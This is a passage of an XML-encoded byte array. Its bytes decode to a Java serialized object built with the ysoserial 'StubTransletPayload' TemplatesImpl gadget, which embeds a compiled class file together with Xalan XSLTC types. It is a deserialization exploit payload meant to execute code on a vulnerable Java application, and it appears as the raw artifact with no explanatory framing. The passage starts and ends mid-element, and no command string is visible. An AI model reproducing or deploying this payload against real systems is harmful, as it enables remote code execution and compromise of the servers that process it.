index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>12</byte></void><void index=\"541\"><byte>73</byte></void><void index=\"542\"><byte>110</byte></void><void index=\"543\"><byte>110</byte></void><void index=\"544\"><byte>101</byte></void><void index=\"545\"><byte>114</byte></void><void index=\"546\"><byte>67</byte></void><void index=\"547\"><byte>108</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>115</byte></void><void index=\"550\"><byte>115</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>115</byte></void><void index=\"553\"><byte>1</byte></void><void index=\"554\"><byte>0</byte></void><void index=\"555\"><byte>53</byte></void><void index=\"556\"><byte>76</byte></void><void index=\"557\"><byte>121</byte></void><void index=\"558\"><byte>115</byte></void><void index=\"559\"><byte>111</byte></void><void index=\"560\"><byte>115</byte></void><void index=\"561\"><byte>101</byte></void><void index=\"562\"><byte>114</byte></void><void index=\"563\"><byte>105</byte></void><void index=\"564\"><byte>97</byte></void><void index=\"565\"><byte>108</byte></void><void index=\"566\"><byte>47</byte></void><void index=\"567\"><byte>112</byte></void><void index=\"568\"><byte>97</byte></void><void index=\"569\"><byte>121</byte></void><void index=\"570\"><byte>108</byte></void><void index=\"571\"><byte>111</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>100</byte></void><void index=\"574\"><byte>115</byte></void><void index=\"575\"><byte>47</byte></void><void index=\"576\"><byte>117</byte></void><void index=\"577\"><byte>116</byte></void><void index=\"578\"><byte>105</byte></void><void index=\"579\"><byte>108</byte></void><void index=\"580\"><byte>47</byte></void><void index=\"581\"><byte>71</byte></void><void index=\"582\"><byte>97</byte></void><void index=\"583\"><byte>100</byte></void><void index=\"584\"><byte>103</byte></void><void index=\"585\"><byte>101</byte></void><void index=\"586\"><byte>116</byte></void><void index=\"587\"><byte>115</byte></void><void index=\"588\"><byte>36</byte></void><void index=\"589\"><byte>83</byte></void><void index=\"590\"><byte>116</byte></void><void index=\"591\"><byte>117</byte></void><void index=\"592\"><byte>98</byte></void><void index=\"593\"><byte>84</byte></void><void index=\"594\"><byte>114</byte></void><void index=\"595\"><byte>97</byte></void><void index=\"596\"><byte>110</byte></void><void index=\"597\"><byte>115</byte></void><void index=\"598\"><byte>108</byte></void><void index=\"599\"><byte>101</byte></void><void index=\"600\"><byte>116</byte></void><void index=\"601\"><byte>80</byte></void><void index=\"602\"><byte>97</byte></void><void index=\"603\"><byte>121</byte></void><void index=\"604\"><byte>108</byte></void><void index=\"605\"><byte>111</byte></void><void index=\"606\"><byte>97</byte></void><void index=\"607\"><byte>100</byte></void><void index=\"608\"><byte>59</byte></void><void index=\"609\"><byte>1</byte></void><void index=\"610\"><byte>0</byte></void><void index=\"611\"><byte>9</byte></void><void index=\"612\"><byte>116</byte></void><void index=\"613\"><byte>114</byte></void><void index=\"614\"><byte>97</byte></void><void index=\"615\"><byte>110</byte></void><void index=\"616\"><byte>115</byte></void><void index=\"617\"><byte>102</byte></void><void index=\"618\"><byte>111</byte></void><void index=\"619\"><byte>114</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>1</byte></void><void index=\"622\"><byte>0</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>40</byte></void><void index=\"625\"><byte>76</byte></void><void index=\"626\"><byte>99</byte></void><void index=\"627\"><byte>111</byte></void><void index=\"628\"><byte>109</byte></void><void index=\"629\"><byte>47</byte></void><void index=\"630\"><byte>115</byte></void><void index=\"631\"><byte>117</byte></void><void index=\"632\"><byte>110</byte></void><void index=\"633\"><byte>47</byte></void><void index=\"634\"><byte>111</byte></void><void index=\"635\"><byte>114</byte></void><void index=\"636\"><byte>103</byte></void><void index=\"637\"><byte>47</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>112</byte></void><void index=\"640\"><byte>97</byte></void><void index=\"641\"><byte>99</byte></void><void index=\"642\"><byte>104</byte></void><void index=\"643\"><byte>101</byte></void><void index=\"644\"><byte>47</byte></void><void index=\"645\"><byte>120</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>108</byte></void><void index=\"648\"><byte>97</byte></void><void index=\"649\"><byte>110</byte></void><void index=\"650\"><byte>47</byte></void><void index=\"651\"><byte>105</byte></void><void index=\"652\"><byte>110</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>101</byte></void><void index=\"655\"><byte>114</byte></void><void index=\"656\"><byte>110</byte></void><void index=\"657\"><byte>97</byte></void><void index=\"658\"><byte>108</byte></void><void index=\"659\"><byte>47</byte></void><void index=\"660\"><byte>120</byte></void><void index=\"661\"><byte>115</byte></void><void index=\"662\"><byte>108</byte></void><void index=\"663\"><byte>116</byte></void><void index=\"664\"><byte>99</byte></void><void index=\"665\"><byte>47</byte></void><void index=\"666\"><byte>68</byte></void><void index=\"667\"><byte>79</byte></void><void index=\"668\"><byte>77</byte></void><void index=\"669\"><byte>59</byte></void><void index=\"670\"><byte>91</byte></void><void index=\"671\"><byte>76</byte></void><void index=\"672\"><byte>99</byte></void><void index=\"673\"><byte>111</byte></void><void index=\"674\"><byte>109</byte></void><void index=\"675\"><byte>47</byte></void><void index=\"676\"><byte>115</byte></void><void index=\"677\"><byte>117</byte></void><void index=\"678\"><byte>110</byte></void><void index=\"679\"><byte>47</byte></void><void index=\"680\"><byte>111</byte></void><void index=\"681\"><byte>114</byte></void><void index=\"682\"><byte>103</byte></void><void index=\"683\"><byte>47</byte></void><void index=\"684\"><byte>97</byte></void><void index=\"685\"><byte>112</byte></void><void index=\"686\"><byte>97</byte></void><void index=\"687\"><byte>99</byte></void><void index=\"688\"><byte>104</byte></void><void index=\"689\"><byte>101</byte></void><void index=\"690\"><byte>47</byte></void><void index=\"691\"><byte>120</byte></void><void index=\"692\"><byte>109</byte></void><void index=\"693\"><byte>108</byte></void><void index=\"694\"><byte>47</byte></void><void index=\"695\"><byte>105</byte></void><void index=\"696\"><byte>110</byte></void><void index=\"697\"><byte>116</byte></void><void index=\"698\"><byte>101</byte></void><void index=\"699\"><byte>114</byte></void><void index=\"700\"><byte>110</byte></void><void index=\"701\"><byte>97</byte></void><void index=\"702\"><byte>108</byte></void><void index=\"703\"><byte>47</byte></void><void index=\"704\"><byte>115</byte></void><void index=\"705\"><byte>101</byte></void><void index=\"706\"><byte>114</byte></void><void index=\"707\"><byte>105</byte></void><void index=\"708\"><byte>97</byte></void><void index=\"709\"><byte>108</byte></void><void index=\"710\"><byte>105</byte></void><void index=\"711\"><byte>122</byte></void><void index=\"712\"><byte>101</byte></void><void index=\"713\"><byte>114</byte></void><void index=\"714\"><byte>47</byte></void><void index=\"715\"><byte>83</byte></void><void index=\"716\"><byte>101</byte></void><void index=\"717\"><byte>114</byte></void><void index=\"718\"><byte>105</byte></void><void index=\"719\"><byte>97</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>105</byte></void><void index=\"722\"><byte>122</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>116</byte></void><void index=\"725\"><byte>105</byte></void><void index=\"726\"><byte>111</byte></void><void index=\"727\"><byte>110</byte></void><void index=\"728\"><byte>72</byte></void><void index=\"729\"><byte>97</byte></void><void index=\"730\"><byte>110</byte></void><void index=\"731\"><byte>100</byte></void><void index=\"732\"><byte>108</byte></void><void index=\"733\"><byte>101</byte></void><void index=\"734\"><byte>114</byte></void><void index=\"735\"><byte>59</byte></void><void index=\"736\"><byte>41</byte></void><void index=\"737\"><byte>86</byte></void><void index=\"738\"><byte>1</byte></void><void index=\"739\"><byte>0</byte></void><void index=\"740\"><byte>8</byte></void><void index=\"741\"><byte>100</byte></void><void index=\"742\"><byte>111</byte></void><void index=\"743\"><byte>99</byte></void><void index=\"744\"><byte>117</byte></void><void index=\"745\"><byte>109</byte></void><void index=\"746\"><byte>101</byte></void><void index=\"747\"><byte>110</byte></void><void index=\"748\"><byte>116</byte></void><void index=\"749\"><byte>1</byte></void><void index=\"750\"><byte>0</byte></void><void index=\"751\"><byte>45</byte></void><void index=\"752\"><byte>76</byte></void><void index=\"753\"><byte>99</byte></void><void index=\"754\"><byte>111</byte></void><void index=\"755\"><byte>109</byte></void><void index=\"756\"><byte>47</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>117</byte></void><void index=\"759\"><byte>110</byte></void><void index=\"760\"><byte>47</byte></void><void index=\"761\"><byte>111</byte></void><void index=\"762\"><byte>114</byte></void><void index=\"763\"><byte>103</byte></void><void index=\"764\"><byte>47</byte></void><void index=\"765\"><byte>97</byte></void><void index=\"766\"><byte>112</byte></void><void index=\"767\"><byte>97</byte></void><void index=\"768\"><byte>99</byte></void><void index=\"769\"><byte>104</byte></void><void index=\"770\"><byte>101</byte></void><void index=\"771\"><byte>47</byte></void><void index=\"772\"><byte>120</byte></void><void index=\"773\"><byte>97</byte></void><void index=\"774\"><byte>108</byte></void><void index=\"775\"><byte>97</byte></void><void index=\"776\"><byte>110</byte></void><void index=\"777\"><byte>47</byte></void><void index=\"778\"><byte>105</byte></void><void index=\"779\"><byte>110</byte></void><void index=\"780\"><byte>116</byte></void><void index=\"781\"><byte>101</byte></void><void index=\"782\"><byte>114</byte></void><void index=\"783\"><byte>110</byte></void><void index=\"784\"><byte>97</byte></void><void index=\"785\"><byte>108</byte></void><void index=\"786\"><byte>47</byte></void><void index=\"787\"><byte>120</byte></void><void index=\"788\"><byte>115</byte></void><void index=\"789\"><byte>108</byte></void><void index=\"790\"><byte>116</byte></void><void index=\"791\"><byte>99</byte></void><void index=\"792\"><byte>47</byte></void><void index=\"793\"><byte>68</byte></void><void index=\"794\"><byte>79</byte></void><void index=\"795\"><byte>77</byte></void><void index=\"796\"><byte>59</byte></void><void index=\"797\"><byte>1</byte></void><void index=\"798\"><byte>0</byte></void><void index=\"799\"><byte>8</byte></void><void index=\"800\"><byte>104</byte></void><void index=\"801\"><byte>97</byte></void><void index=\"802\"><byte>110</byte></void><void index=\"803\"><byte>100</byte></void><void index=\"804\"><byte>108</byte></void><void index=\"805\"><byte>101</byte></void><void index=\"806\"><byte>114</byte></void><void index=\"807\"><byte>115</byte></void><void index=\"808\"><byte>1</byte></void><void index=\"809\"><byte>0</byte></void><void index=\"810\"><byte>66</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void index=\"825\"><byte>97</byte></void><void index=\"826\"><byte>112</byte></void><void index=\"827\"><byte>97</byte></void><void index=\"828\"><byte>99</byte></void><void index=\"829\"><byte>104</byte></void><void index=\"830\"><byte>101</byte></void><void index=\"831\"><byte>47</byte></void><void index=\"832\"><byte>120</byte></void><void index=\"833\"><byte>109</byte></void><void index=\"834\"><byte>108</byte></void><void index=\"835\"><byte>47</byte></void><void index=\"836\"><byte>105</byte></void><void index=\"837\"><byte>110</byte></void><void index=\"838\"><byte>116</byte></void><void index=\"839\"><byte>101</byte></void><void index=\"840\"><byte>114</byte></void><void index=\"841\"><byte>110</byte></void><void index=\"842\"><byte>97</byte></void><void index=\"843\"><byte>108</byte></void><void index=\"844\"><byte>47</byte></void><void index=\"845\"><byte>115</byte></void><void index=\"846\"><byte>101</byte></void><void index=\"847\"><byte>114</byte></void><void index=\"848\"><byte>105</byte></void><void index=\"849\"><byte>97</byte></void><void index=\"850\"><byte>108</byte></void><void index=\"851\"><byte>105</byte></void><void index=\"852\"><byte>122</byte></void><void index=\"853\"><byte>101</byte></void><void index=\"854\"><byte>114</byte></void><void index=\"855\"><byte>47</byte></void><void index=\"856\"><byte>83</byte></void><void index=\"857\"><byte>101</byte></void><void index=\"858\"><byte>114</byte></void><void index=\"859\"><byte>105</byte></void><void index=\"860\"><byte>97</byte></void><void index=\"861\"><byte>108</byte></void><void index=\"862\"><byte>105</byte></void><void index=\"863\"><byte>122</byte></void><void index=\"864\"><byte>97</byte></void><void index=\"865\"><byte>116</byte></void><void index=\"866\"><byte>105</byte></void><void index=\"867\"><byte>111</byte></void><void index=\"868\"><byte>110</byte></void><void index=\"869\"><byte>72</byte></void><void index=\"870\"><byte>97</byte></void><void index=\"871\"><byte>110</byte></void><void index=\"872\"><byte>100</byte></void><void index=\"873\"><byte>108</byte></void><void index=\"874\"><byte>101</byte></void><void index=\"875\"><byte>114</byte></void><void index=\"876\"><byte>59</byte></void><void index=\"877\"><byte>1</byte></void><void index=\"878\"><byte>0</byte></void><void index=\"879\"><byte>10</byte></void><void index=\"880\"><byte>69</byte></void><void index=\"881\"><byte>120</byte></void><void index=\"882\"><byte>99</byte></void><void index=\"883\"><byte>101</byte></void><void index=\"884\"><byte>112</byte></void><void index=\"885\"><byte>116</byte></void><void index=\"886\"><byte>105</byte></void><void index=\"887\"><byte>111</byte></void><void index=\"888\"><byte>110</byte></void><void index=\"889\"><byte>115</byte></void><void index=\"890\"><byte>7</byte></void><void index=\"891\"><byte>0</byte></void><void index=\"892\"><byte>39</byte></void><void index=\"893\"><byte>1</byte></void><void index=\"894\"><byte>0</byte></void><void index=\"895\"><byte>-90</byte></void><void index=\"896\"><byte>40</byte></void><void index=\"897\"><byte>76</byte></void><void index=\"898\"><byte>99</byte></void><void index=\"899\"><byte>111</byte></void><void index=\"900\"><byte>109</byte></void><void index=\"901\"><byte>47</byte></void><void index=\"902\"><byte>115</byte></void><void index=\"903\"><byte>117</byte></void><void index=\"904\"><byte>110</byte></void><void index=\"905\"><byte>47</byte></void><void index=\"906\"><byte>111</byte></void><void index=\"907\"><byte>114</byte></void><void index=\"908\"><byte>103</byte></void><void index=\"909\"><byte>47</byte></void><void index=\"910\"><byte>97</byte></void><void index=\"911\"><byte>112</byte></void><void index=\"912\"><byte>97</byte></void><void index=\"913\"><byte>99</byte></void><void index=\"914\"><byte>104</byte></void><void index=\"915\"><byte>101</byte></void><void index=\"916\"><byte>47</byte></void><void index=\"917\"><byte>120</byte></void><void index=\"918\"><byte>97</byte></void><void index=\"919\"><byte>108</byte></void><void index=\"920\"><byte>97</byte></void><void index=\"921\"><byte>110</byte></void><void index=\"922\"><byte>47</byte></void><void index=\"923\"><byte>105</byte></void><void index=\"924\"><byte>110</byte></void><void index=\"925\"><byte>116</byte></void><void index=\"926\"><byte>101</byte></void><void index=\"927\"><byte>114</byte></void><void index=\"928\"><byte>110</byte></void><void index=\"929\"><byte>97</byte></void><void index=\"930\"><byte>108</byte></void><void index=\"931\"><byte>47</byte></void><void index=\"932\"><byte>120</byte></void><void index=\"933\"><byte>115</byte></void><void index=\"934\"><byte>108</byte></void><void index=\"935\"><byte>116</byte></void><void index=\"936\"><byte>99</byte></void><void index=\"937\"><byte>47</byte></void><void index=\"938\"><byte>68</byte></void><void index=\"939\"><byte>79</byte></void><void index=\"940\"><byte>77</byte></void><void index=\"941\"><byte>59</byte></void><void index=\"942\"><byte>76</byte></void><void index=\"943\"><byte>99</byte></void><void index=\"944\"><byte>111</byte></void><void index=\"945\"><byte>109</byte></void><void index=\"946\"><byte>47</byte></void><void index=\"947\"><byte>115</byte></void><void index=\"948\"><byte>117</byte></void><void index=\"949\"><byte>110</byte></void><void index=\"950\"><byte>47</byte></void><void index=\"951\"><byte>111</byte></void><void index=\"952\"><byte>114</byte></void><void index=\"953\"><byte>103</byte></void><void index=\"954\"><byte>47</byte></void><void index=\"955\"><byte>97</byte></void><void index=\"956\"><byte>112</byte></void><void index=\"957\"><byte>97</byte></void><void index=\"958\"><byte>99</byte></void><void index=\"959\"><byte>104</byte></void><void index=\"960\"><byte>101</byte></void><void index=\"961\"><byte>47</byte></void><void index=\"962\"><byte>120</byte></void><void index=\"963\"><byte>109</byte></void><void index=\"964\"><byte>108</byte></void><void index=\"965\"><byte>47</byte></void><void index=\"966\"><byte>105</byte></void><void index=\"967\"><byte>110</byte></void><void index=\"968\"><byte>116</byte></void><void index=\"969\"><byte>101</byte></void><void index=\"970\"><byte>114</byte></void><void index=\"971\"><byte>110</byte></void><void index=\"972\"><byte>97</byte></void><void index=\"973\"><byte>108</byte></void><void index=\"974\"><byte>47</byte></void><void index=\"975\"><byte>100</byte></void><void index=\"976\"><byte>116</byte></void><void index=\"977\"><byte>109</byte></void><void index=\"978\"><byte>47</byte></void><void index=\"979\"><byte>68</byte></void><void index=\"980\"><byte>84</byte></void><void index=\"981\"><byte>77</byte></void><void index=\"982\"><byte>65</byte></void><void index=\"983\"><byte>120</byte></void><void index=\"984\"><byte>105</byte></void><void index=\"985\"><byte>115</byte></void><void index=\"986\"><byte>73</byte></void><void index=\"987\"><byte>116</byte></void><void index=\"988\"><byte>101</byte></void><void index=\"989\"><byte>114</byte></void><void index=\"990\"><byte>97</byte></void><void index=\"991\"><byte>116</byte></void><void index=\"992\"><byte>111</byte></void><void index=\"993\"><byte>114</byte></void><void index=\"994\"><byte>59</byte></void><void index=\"995\"><byte>76</byte></void><void index=\"996\"><byte>99</byte></void><void index=\"997\"><byte>111</byte></void><void index=\"998\"><byte>109</byte></void><void index=\"999\"><byte>47</byte></void><void index=\"1000\"><byte>115</byte></void><void index=\"1001\"><byte>117</byte></void><void index=\"1002\"><byte>110</byte></void><void index=\"1003\"><byte>47</byte></void><void index=\"1004\"><byte>111</byte></void><void index=\"1005\"><byte>114</byte></void><void index=\"1006\"><byte>103</byte></void><void index=\"1007\"><byte>47</byte></void><void index=\"1008\"><byte>97</byte></void><void index=\"1009\"><byte>112</byte></void><void index=\"1010\"><byte>97</byte></void><void index=\"1011\"><byte>99</byte></void><void index=\"1012\"><byte>104</byte></void><void index=\"1013\"><byte>101</byte></void><void index=\"1014\"><byte>47</byte></void><void index=\"1015\"><byte>120</byte></void><void index=\"1016\"><byte>109</byte></void><void index=\"1017\"><byte>108</byte></void><void index=\"1018\"><byte>47</byte></void><void index=\"1019\"><byte>105</byte></void><void 